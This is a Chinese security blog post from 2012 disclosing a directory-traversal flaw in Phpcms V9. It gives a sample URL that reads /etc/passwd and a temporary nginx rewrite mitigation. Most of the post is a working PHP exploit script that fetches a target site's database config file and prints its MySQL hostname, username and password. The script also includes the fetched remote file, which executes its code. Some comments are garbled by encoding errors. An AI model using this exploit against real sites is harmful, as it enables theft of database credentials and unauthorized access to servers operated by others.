Phpcms V9 直接爆mysql连接密码 附测试Code
2012-07-26 22:57:04   来源:   评论:0 点击:

Phpcms v9 爆严重漏洞 直接爆mysql连接密码 附测试Code

Phpcms v9 爆严重漏洞 直接爆mysql连接密码 附测试Code
 
Phpcms 国内应用相当广泛的开源程序、如今爆出严重漏洞可以直接读取配置文件及系统文件
Phpcms V9 直接爆mysql连接密码 附测试Code

如下便可以读取系统文件:
http://www.5iops.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../../../../../../../etc/passwd 
临时修补方案:
nginx配置中,添加改写过滤:
    if ($request_uri ~* (.*)\.\.(.*)) {
      rewrite ^/(.*)([^/])$ / last;
    }

测试Code:
<?php
/**
* PHPcms V9 脠脪脦录镁露脕隆漏露麓录矛鹿陇戮脽 *
 *
 *
* 注脪卤戮鲁脤貌漏学习虏慰录拢卢虏禄碌脙脙诜欠篓禄楼露炉
* 路帽贸愿潞拢卢脫卤戮脠脦鹿锖兟?
                                    */
 
function showInfo() {
 
print '
***********************************************
* PHPcmsV9 Read All File ExpTool
*
*
*
*
*
* Example: php exp.php wwww.phpcms.cn
***********************************************
';
}
 
$exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php';
 
//file_get_contents(''.$exp);
if(count($argv) < 2){
showInfo();
}else{
 
$exp = 'http://'.$argv[1].$exp;
$data = @file_get_contents($exp);
@file_put_contents('expDatabase.php', $data);
if(strstr($data,'<html>')){
showInfo();
echo 'Not found !';
exit();
};
$database = include 'expDatabase.php';
showInfo();
$out = 'HostName: '.$database['default']['hostname']."\n";
$out .='DataBase:'. $database['default']['database']."\n";
$out .='UserName:'. $database['default']['username']."\n";
$out .='Password:'. $database['default']['password']."\n";
if(!empty($database)){
echo "Found it! :\n\n";
echo $out;
}
@unlink('expDatabase.php');

相关热词搜索:phpcmsv9漏洞

上一篇:SQL注入还是一个问题
下一篇:最后一页

分享到: 收藏